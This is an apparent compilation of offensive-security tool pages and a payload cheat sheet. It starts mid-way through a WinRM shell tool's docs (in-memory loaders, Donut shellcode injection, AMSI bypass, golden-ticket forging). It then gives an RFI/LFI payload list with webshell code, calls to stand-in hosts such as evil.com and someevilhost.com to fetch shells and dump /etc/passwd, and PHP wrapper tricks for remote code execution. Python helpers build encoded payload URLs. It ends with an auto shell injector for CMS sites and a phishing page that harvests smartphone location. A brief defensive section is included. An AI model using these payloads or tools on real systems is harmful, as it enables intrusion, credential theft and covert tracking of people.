  • To load a ps1 file you just have to type its name (auto-completion using the tab key is allowed). The scripts must be in the path set by the -s argument. Type menu again to see the loaded functions. Very large files can take a long time to load.

Advanced commands
  • Invoke-Binary: allows exes compiled from C# to be executed in memory. The name can be auto-completed using the tab key, and up to 3 parameters are allowed. The executables must be in the path set by the -e argument.

  • l04d3r-LoadDll: allows loading dll libraries in memory, it is equivalent to: [Reflection.Assembly]::Load([IO.File]::ReadAllBytes("pwn.dll"))
    The dll file can be hosted by smb, http or locally. Once it is loaded type menu, then it is possible to autocomplete all functions.


  • Donut-Loader: allows injecting x64 payloads generated with the awesome donut technique. No need to encode payload.bin; just generate and inject!
  • You can use this donut-maker to generate payload.bin if you don't use Windows. That script uses a Python module written by Marcello Salvati (byt3bl33d3r). It can be installed using pip:
  • pip3 install donut-shellcode

  • Bypass-4MSI: patches AMSI protection.

Kerberos
  • First you have to sync date with the DC: rdate -n <dc_ip>
  • To generate ticket there are many ways:
    • Using ticketer.py from impacket:
      ticketer.py -dc-ip <dc_ip> -nthash <krbtgt_nthash> -domain-sid <domain_sid> -domain <domain_name> <user>
    • If you get a kirbi ticket using Rubeus or Mimikatz you have to convert to ccache using ticket_converter.py:
      python ticket_converter.py ticket.kirbi ticket.ccache
  • Add ccache ticket. There are 2 ways:
    export KRB5CCNAME=/foo/var/ticket.ccache
    cp ticket.ccache /tmp/krb5cc_0
  • Add realm to /etc/krb5.conf (for linux). Use of this format is important:
     CONTOSO.COM = {
    kdc = fooserver.contoso.com
    }
  • Check Kerberos tickets with klist
  • To remove ticket use: kdestroy
  • For more information about Kerberos check this cheatsheet

Extra features
  • To disable colors, just modify the $colors_enabled variable in the code and set it to false: $colors_enabled = false

Credits:
Main author:
Collaborators, developers, documenters, testers and supporters:
Hat tip to:
  • Alamot for his original code.
  • 3v4Si0N for his awesome dll loader.
  • WinRb All contributors of ruby library.
  • TheWover for his awesome donut tool.
  • byt3bl33d3r for his python library to create donut payloads.
  • Sh11td0wn for inspiration about new features.


RFI/LFI Payload List


As with many exploits, remote and local file inclusions are ultimately a problem of careless coding. This article will hopefully give you an idea of how to protect your website and, most importantly, your code from file inclusion exploits. I'll give code examples in PHP.

Let’s look at some of the code that makes RFI / LFI exploits possible.
<a href="index.php?page=file1.php">Files</a>
<?php
$page = $_GET['page'];
include($page);
?>
Now obviously this should not be used. The $page input is not sanitized at all: it is passed straight into include(), which is a big "NO". Always sanitize any input that arrives through the browser. When the user clicks "Files" on the web page to visit files.php, the URL will look something like this:
http://localhost/index.php?page=files.php
If nothing sanitizes the input in the $page variable, we can point it at anything we want. If the site is hosted on a Unix/Linux server, we can display password or configuration files through the unsanitized variable.
Viewing files on the server is a "Local File Inclusion" (LFI) exploit. This is no worse than an RFI exploit.
http://localhost/index.php?page=../../../../../../etc/passwd
The code will probably return the contents of /etc/passwd. Now let's look at the RFI side of this exploit, using some of the code from before.
<a href="index.php?page=file1.php">Files</a>
<?php
$page = $_GET['page'];
include($page);
?>
Now suppose we request something like:
http://localhost/index.php?page=http://google.com/
Where the $page variable was originally included in the page, we now get the google.com homepage. This is where the coder gets hurt. We all know what a c99 shell can do, and if coders are not careful it can be included in the page, allowing an attacker to browse sensitive files and directories at will. Let's look at something simpler that can happen on a web page: the quick and dirty use of an RFI exploit. Create a file named "test.php", put the following code in it, and save it:

<?php
passthru($_GET['cmd']);
?>
This file is something you can include on a vulnerable page through the RFI exploit. The passthru() command in PHP is very evil, and many hosts disable it "for security reasons". With this code in test.php, we can send a request to the vulnerable web page:
http://localhost/index.php?page=http://someevilhost.com/test.php
Since test.php reads its command from a $_GET request, we can also supply a command for passthru(). We can do something like this:
http://localhost/index.php?page=http://someevilhost.com/test.php?cmd=cat /etc/passwd
On a Unix machine this will dump the file /etc/passwd using the cat command. Now that we know how RFI exploitation works, we need to know how to stop it: how to make it impossible for anyone to execute commands or include remote pages on your server. First, we could disable passthru(), but something else on your site might legitimately use it (hopefully not), so that alone is not enough. I suggest sanitizing the inputs, as I said before. Instead of passing variables directly to the page, we can run them through a few of the functions PHP provides. To start with, chop(), adapted into PHP from Perl, removes whitespace from the end of a string. We can use it like this:
<a href="index.php?page=file1.php">Files</a>
<?php
$page = chop($_GET['page']);
include($page);
?>
There are many functions that can sanitize strings: htmlspecialchars(), htmlentities(), stripslashes() and more. Personally, I prefer to wrap them in my own function. Here is something quick and easy you can use:
<?php
function cleanAll($input) {
    $input = strip_tags($input);
    $input = htmlspecialchars($input);
    return $input;
}
?>
Hopefully you can see what is going on inside this function, so you can add your own checks. I would also suggest looking at str_replace() and the many other string functions available for cleanup. Be considerate and stop the RFI/LFI exploit frenzy!
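Stripping tags helps, but the most robust fix for this class of bug is an allowlist: only ever include pages from a fixed set. The same idea as the PHP advice above, sketched in Python for illustration (the page names are hypothetical):

```python
# Allowlist approach: map user input onto a fixed set of known pages,
# never a path built from the raw request.
ALLOWED_PAGES = {"file1.php", "about.php", "contact.php"}  # hypothetical site pages

def resolve_page(user_input: str) -> str:
    # Anything not explicitly allowed (traversal sequences, remote URLs,
    # null bytes) falls back to a safe default page.
    if user_input in ALLOWED_PAGES:
        return user_input
    return "index.php"

print(resolve_page("file1.php"))                         # file1.php
print(resolve_page("../../../../etc/passwd"))            # index.php
print(resolve_page("http://someevilhost.com/test.php"))  # index.php
```

With an allowlist there is nothing to sanitize: unexpected input is simply never passed to include().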

Basic LFI (null byte, double encoding and other tricks) :
http://example.com/index.php?page=etc/passwd
http://example.com/index.php?page=etc/passwd%00
http://example.com/index.php?page=../../etc/passwd
http://example.com/index.php?page=%252e%252e%252f
http://example.com/index.php?page=....//....//etc/passwd
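The %252e%252e%252f entry above is just ../ URL-encoded twice: one decode yields %2e%2e%2f and a second yields ../, which defeats filters that only decode once. A small sketch of generating both forms:

```python
# Build single- and double-URL-encoded variants of a traversal sequence.
def url_encode_all(s: str) -> str:
    # Percent-encode every character, dots and slashes included.
    return "".join(f"%{ord(c):02x}" for c in s)

traversal = "../"
single = url_encode_all(traversal)    # a filter decoding once sees '../'
double = single.replace("%", "%25")   # a filter must decode twice to see '../'

print(single)  # %2e%2e%2f
print(double)  # %252e%252e%252f
```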
Interesting files to check out :
/etc/issue
/etc/passwd
/etc/shadow
/etc/group
/etc/hosts
/etc/motd
/etc/mysql/my.cnf
/proc/[0-9]*/fd/[0-9]* (first number is the PID, second is the filedescriptor)
/proc/self/environ
/proc/version
/proc/cmdline

Basic RFI (null byte, double encoding and other tricks) :
http://example.com/index.php?page=http://evil.com/shell.txt
http://example.com/index.php?page=http://evil.com/shell.txt%00
http://example.com/index.php?page=http:%252f%252fevil.com%252fshell.txt

LFI / RFI Wrappers :
LFI Wrapper rot13 and base64 - php://filter case insensitive.
http://example.com/index.php?page=php://filter/read=string.rot13/resource=index.php
http://example.com/index.php?page=php://filter/convert.base64-encode/resource=index.php
http://example.com/index.php?page=pHp://FilTer/convert.base64-encode/resource=index.php

Can be chained with a compression wrapper.
http://example.com/index.php?page=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd
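The convert.base64-encode filter makes PHP return the target file's source as a base64 string instead of executing it, so recovering the source is just a decode. A sketch, with a locally generated sample standing in for a real response body:

```python
import base64

# Hypothetical body returned by the php://filter URL above
# (generated locally here to keep the example self-contained).
php_source = b"<?php $db_pass = 'secret'; ?>"
response_body = base64.b64encode(php_source).decode()

recovered = base64.b64decode(response_body)
print(recovered.decode())  # the PHP source, never executed by the server
```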

LFI Wrapper ZIP :
echo "<pre><?php system($_GET['cmd']); ?></pre>" > payload.php;  
zip payload.zip payload.php;
mv payload.zip shell.jpg;
rm payload.php

http://example.com/index.php?page=zip://shell.jpg%23payload.php
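The same archive can be built programmatically; a sketch using Python's zipfile module with the filenames from the example. The %23 in the URL is a URL-encoded '#', separating the archive path from the member to include inside it:

```python
import io
import zipfile

# Pack the PHP payload into zip data that will be served as 'shell.jpg'.
payload = b"<?php system($_GET['cmd']); ?>"
buf = io.BytesIO()
with zipfile.ZipFile(buf, "w") as zf:
    zf.writestr("payload.php", payload)

with open("shell.jpg", "wb") as f:  # zip data, .jpg extension
    f.write(buf.getvalue())

print("http://example.com/index.php?page=zip://shell.jpg%23payload.php")
```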

RFI Wrapper DATA with "<?php system($_GET['cmd']);echo 'Shell done !'; ?>" payload :
http://example.net/?page=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ZWNobyAnU2hlbGwgZG9uZSAhJzsgPz4=
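The base64 blob in this data:// URL is simply the PHP payload encoded; it decodes to <?php system($_GET['cmd']);echo 'Shell done !'; ?>. Building such a URL can be sketched as:

```python
import base64

# Encode the PHP payload for a data:// wrapper URL.
payload = b"<?php system($_GET['cmd']);echo 'Shell done !'; ?>"
b64 = base64.b64encode(payload).decode()

url = f"http://example.net/?page=data://text/plain;base64,{b64}"
print(url)
```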

RFI Wrapper EXPECT :
http://example.com/index.php?page=expect://id
http://example.com/index.php?page=expect://ls

XSS via RFI/LFI with "<svg onload=alert(1)>" payload :
http://example.com/index.php?page=data:application/x-httpd-php;base64,PHN2ZyBvbmxvYWQ9YWxlcnQoMSk+

LFI to RCE via /proc/*/fd :
  1. Upload a lot of shells (for example : 100)
  2. Include http://example.com/index.php?page=/proc/$PID/fd/$FD with $PID = PID of the process (can be bruteforced) and $FD the filedescriptor (can be bruteforced too)

LFI to RCE via Upload :
http://example.com/index.php?page=path/to/uploaded/file.png

References :
Testing for Local File Inclusion
Wikipedia
Remote File Inclusion
Wikipedia: "Remote File Inclusion"
PHP File Inclusion


Jaeles - The Swiss Army Knife For Automated Web Application Testing


Jaeles is a powerful, flexible and easily extensible framework written in Go for building your own Web Application Scanner.

Installation
go get -u github.com/jaeles-project/jaeles
Please visit the Official Documentation for more details.
Check out the Signature Repo for base signatures.

Usage
More usage here
Example commands.
jaeles scan -u http://example.com

jaeles scan -s signatures/common/phpdebug.yaml -U /tmp/list_of_urls.txt

jaeles scan --retry 3 --verbose -s "signatures/cves/jira-*" -U /tmp/list_of_urls.txt

jaeles --verbose server -s sqli

Showcases
More showcase here
Detect Jira SSRF CVE-2019-8451

Contribute
If you have a new idea for this project, an issue, feedback, or you found some valuable tool, feel free to open an issue or just DM me via @j3ssiejjj.

Credits


Vulnx v1.9 - An Intelligent Bot Auto Shell Injector That Detect Vulnerabilities In Multiple Types Of CMS (Wordpress, Joomla, Drupal, Prestashop...)


Vulnx is an intelligent bot and auto shell injector that detects vulnerabilities in multiple types of CMS. It performs fast CMS detection, information gathering and vulnerability scanning of the target, covering subdomains, IP addresses, country, org, timezone, region, ASN and more.
Instead of injecting each and every shell manually like all the other tools do, Vulnx analyses the target website, checks for the presence of a vulnerability, and only then injects the shell. It can also search for target URLs with its dorks tool.

Features
  • Detect cms (wordpress, joomla, prestashop, drupal, opencart, magento, lokomedia)
  • Target informations gatherings
  • Target Subdomains gathering
  • Multi-threading on demand
  • Checks for vulnerabilities
  • Auto shell injector
  • Exploit dork searcher
  • Ports Scan High Level
  • Dns-Servers Dump
  • Input multiple targets to scan.
  • Dorks listing by name & by exploit name.
  • Export multiple targets from dorks into a logfile.

DNS-Map-Results
To do this, run a scan with the --dns flag and -d for subdomains. To generate a map of isetso.rnu.tn, you can run the command vulnx -u isetso.rnu.tn --dns -d --output $PATH in a new terminal.
$PATH : where the graph results will be stored.


This generates an image displaying the target's subdomains, MX & DNS data.

Exploits


Joomla

Wordpress

Drupal

PrestaShop

Opencart

VulnxMode
NEW: Vulnx now has an interactive mode. URLSET


DORKSET


Available command line options
READ VULNX WIKI
usage: vulnx [options]

-u --url url target
-D --dorks search webs with dorks
-o --output specify output directory
-t --timeout http requests timeout
-c --cms-info search cms info[themes,plugins,user,version..]
-e --exploit searching vulnerability& run exploits
-w --web-info web informations gathering
-d --domain-info subdomains informations gathering
-l, --dork-list list names of dorks exploits
-n, --number-page number page of search engine(Google)
-p, --ports ports to scan
-i, --input specify domains to scan from an input file
--threads number of threads
--dns dns informations gathering

Docker
Run VulnX in Docker:
$ git clone https://github.com/anouarbensaad/VulnX.git
$ cd VulnX
$ docker build -t vulnx ./docker/
$ docker run -it --name vulnx vulnx:latest -u http://example.com
run vulnx container in interactive mode


to view logfiles mount it in a volume like so:
$ docker run -it --name vulnx -v "$PWD/logs:/VulnX/logs" vulnx:latest -u http://example.com
To change the mounting directory, edit this line in the Dockerfile:
VOLUME [ "$PATH" ]

Install vulnx on Ubuntu
$ git clone https://github.com/anouarbensaad/vulnx.git
$ cd VulnX
$ chmod +x install.sh
$ ./install.sh
Now run vulnx


Install vulnx on Termux
$ pkg update
$ pkg install -y git
$ git clone http://github.com/anouarbensaad/vulnx
$ cd vulnx
$ chmod +x install.sh
$ ./install.sh


Install vulnx in Windows
  • click here to download vulnx
  • download and install python3
  • unzip vulnx-master.zip in c:/
  • open the command prompt cmd.
> cd c:/vulnx-master
> python vulnx.py

Example command with options: --timeout 3, all CMS info gathering (-c all), subdomain gathering (-d), web info gathering (-w), and running exploits (--exploit):
vulnx -u http://example.com --timeout 3 -c all -d -w --exploit

Example commands for searching dorks (-D or --dorks, -l or --dork-list):
vulnx --dork-list returns a table of dork exploit names. vulnx -D blaze returns URLs found with the blaze dork.

Versions



Seeker v1.1.9 - Accurately Locate Smartphones Using Social Engineering


The concept behind Seeker is simple: just as we host phishing pages to get credentials, why not host a fake page that requests your location, like many popular location-based websites do?
Seeker hosts a fake website on the in-built PHP server and uses Serveo to generate a link which we forward to the target. The website asks for location permission and, if the target allows it, we can get:
  • Longitude
  • Latitude
  • Accuracy
  • Altitude - Not always available
  • Direction - Only available if user is moving
  • Speed - Only available if user is moving
Along with Location Information we also get Device Information without any permissions :
  • Operating System
  • Platform
  • Number of CPU Cores
  • Amount of RAM - Approximate Results
  • Screen Resolution
  • GPU information
  • Browser Name and Version
  • Public IP Address
  • IP Address Reconnaissance
This tool is a proof of concept and is for educational purposes only. Seeker shows what data a malicious website can gather about you and your devices, and why you should not click on random links or grant critical permissions such as location.

How is this Different from IP GeoLocation
  • Other tools and services offer IP geolocation, which is NOT accurate at all and does not give the location of the target; instead it gives the approximate location of the ISP.
  • Seeker uses the HTML5 Geolocation API: after obtaining location permission, it grabs longitude and latitude using the GPS hardware present in the device, so Seeker works best with smartphones. If GPS hardware is not present, as on a laptop, Seeker falls back to IP geolocation or looks for cached coordinates.
  • Generally, if a user accepts the location permission, the information received is accurate to approximately 30 meters, depending on the device.
Note: on iPhone, for some reason, location accuracy is approximately 65 meters.

Tested On :
  • Kali Linux 2019.2
  • BlackArch Linux
  • Ubuntu 19.04
  • Kali Nethunter
  • Termux
  • Parrot OS

Installation

Kali Linux / Ubuntu / Parrot OS
git clone https://github.com/thewhiteh4t/seeker.git
cd seeker/
chmod 777 install.sh
./install.sh

BlackArch Linux
pacman -S seeker

Docker
# Install docker

curl -fsSL https://get.docker.com -o get-docker.sh
sh get-docker.sh

# Build Seeker

cd seeker/
docker build -t seeker .

# Launch seeker

docker run -t --rm seeker

# OR Pull from DockerHub

docker pull thewhiteh4t/seeker
docker run -t seeker

Termux
git clone https://github.com/thewhiteh4t/seeker.git
cd seeker/
chmod 777 termux_install.sh
./termux_install.sh

Usage
python3 seeker.py -h

usage: seeker.py [-h] [-s SUBDOMAIN]

optional arguments:
-h, --help show this help message and exit
-s SUBDOMAIN, --subdomain Subdomain Provide Subdomain for Serveo URL ( Optional )
-k KML, --kml KML Provide KML Filename ( Optional )
-t TUNNEL, --tunnel TUNNEL Specify Tunnel Mode [manual]

# Example

# SERVEO
########
python3 seeker.py

# NGROK ETC.
############

# In First Terminal Start seeker in Manual mode like this
python3 seeker.py -t manual

# In Second Terminal Start Ngrok or any other tunnel service on port 8080
./ngrok http 8080

#-----------------------------------#

# Subdomain
###########
python3 seeker.py --subdomain google
python3 seeker.py --tunnel manual --subdomain zomato

Known Problems
  • Services like Serveo and Ngrok are banned in some countries such as Russia, so if they are banned in your country you may not get a URL. Otherwise, first READ CLOSED ISSUES; if your problem is not listed there, create a new issue.

Demo


